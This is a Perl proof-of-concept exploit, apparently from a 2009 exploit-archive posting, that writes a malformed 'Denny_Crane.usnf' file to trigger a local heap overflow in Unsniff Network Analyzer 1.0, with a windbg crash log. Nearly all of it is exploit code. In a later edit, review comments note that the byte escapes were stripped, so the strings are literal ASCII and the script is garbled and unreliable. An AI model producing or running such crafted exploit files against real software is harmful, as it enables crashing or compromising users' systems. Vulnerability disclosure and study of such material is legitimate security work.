
# Title : Unsniff Network Analyzer 1.0 (usnf) Local Heap Overflow PoC
# Published : 2009-04-06
# Author : LiquidWorm


#!/usr/bin/perl
#
# Unsniff Network Analyzer 1.0 (usnf) Local Heap Overflow PoC
#
# Summary: Don't just look at hex dumps and protocol trees. With Unsniff
# Network Analyzer, you can view network traffic at various levels of detail.
# View high level objects like images, video, HTML pages, VOIP calls, drill
# down to individual TCP sessions, then onto reassembled PDUs, then finally
# to individual packets. All this functionality is packed in a cool graphical
# interface.
#
# Product web page: http://www.unleashnetworks.com/unsniff/unsniff-2.html
#
# Tested on Microsoft Windows XP Professional SP3 (English)
#
# ----------------------------windbg outpootz-------------------------------
#
# HEAP[usnfctr.exe]: Invalid allocation size - 88888880 (exceeded 7ffdefff)
# (998.d08): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000000 ebx=00000000 ecx=22222220 edx=00000000 esi=01248c58 edi=00000000
# eip=018468d1 esp=0012c754 ebp=0012c7dc iopl=0         nv up ei pl nz na po nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210202
# vocore2u!CatFactory_SysLASwizzle+0x24602:
# 018468d1 f3ab            rep stos dword ptr es:[edi]
# Missing image name, possible paged-out or corrupt data.
#
# --------------------------------------------------------------------------
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#
# liquidworm gmail com
#
# http://www.zeroscience.org/
#
# 06.04.2009
#





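    	     use strict;
use warnings;

# NOTE(review): every byte string below is reproduced exactly as it appears in
# the published listing. The backslashes of what were presumably "\xNN" and
# "\n" escapes look like they were lost when the listing was extracted, so as
# written these are plain ASCII text; they are left untouched deliberately.

# Return the file contents: a fixed header, then twice the group
# (filler run, line-terminator run, "x90" run), then a fixed trailer.
#
#   $fill_count - number of repetitions of the "x4A" filler unit in each
#                 of the two filler runs (defaults to the original 300000).
sub build_payload {
    my ($fill_count) = @_;
    $fill_count = 300000 unless defined $fill_count;

    my $header = join '',
        "x01x00x00x00x11",
        "x27x00x00x56x00x4Fx00x44",
        "x00x41", "x00", "x54x00",
        "x42x00", "x53", "x00x31",
        "x00", "x00", "x00", "x00", "x00",
        "x00x00", "x00", "x00x00",
        "x00x00", "x00", "x00x00",
        "x00x00", "x00x00", "x00x00",
        "x00x20", "x00", "x00", "x00x10",
        "x00x00", "x00", "x40", "x00x00",
        "x00x40x04", "x00x02x00",
        "x40x00";

    my $filler   = "x4A" x $fill_count;
    my $line_end = "x0D" . ("x0A" x 10);   # "x" binds tighter than ".": only "x0A" repeats
    my $nops     = "x90" x 20;

    my $trailer = join '',
        "x00",
        "x00",
        "x00x00x00x00x00x00x00x00x00x00x00x00",
        "x00x00x00x00x00x00x2Cx24x00x00x2Ax24",
        "x00x00", "x29x24x00x00x27x24", "x00x00",
        "x26x24", "x00x00x24x24x00x00", "x23x24",
        "x00x00", "x21x24x00x00x20x24", "x00x00",
        "x1Ex24", "x00x00x1Dx24x00x00", "x1Bx24",
        "x00x00", "x1Ax24x00x00x18x24", "x00x00",
        "x17x24", "x00x00x15x24x00x00", "x14x24",
        "x00x00", "x12x24x00x00x11x24", "x00x00",
        "x0Fx24", "x00x00x0Ex24x00x00", "x0Cx24",
        "x00x00", "x0Bx24x00x00x09x24", "x00x00",
        "x08x24", "x00x00x06x24x00x00", "x05x24",
        "x00x00", "x03x24x00x00x02x24", "x00x00",
        "x00x24x00x00xFFx23",
        "x00x00xFDx23x00x00",
        "xFCx23x00x00xFAx23",
        "x00x00xF9x23x00x00",
        "xF7x23x00x00xF6x23x00x00",
        "xF4x23x00x00xF3x23x00x00xF1x23",
        "x00x00xF0x23x00x00xEEx23x00",
        "x00xEDx23x00x00";

    my $group = $filler . $line_end . $nops;
    return $header . $group . $group . $trailer;
}

# Write the payload to ./Denny_Crane.usnf in the current directory and report.
# Dies instead of silently leaving an empty or partial file behind: the
# original used an unchecked 2-arg open on a bareword handle and never
# checked close, so write failures went unnoticed.
sub main {
    my $file = "Denny_Crane.usnf";
    my $path = "./$file";

    open my $out, '>', $path or die "open $path: $!";
    binmode $out;                            # raw bytes: no newline translation on Windows
    print {$out} build_payload() or die "write $path: $!";
    close $out or die "close $path: $!";     # buffered write errors surface at close

    sleep 1;
    print "nYeah.n";
    print "File $file successfully landed!n";
    return;
}

main() unless caller;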
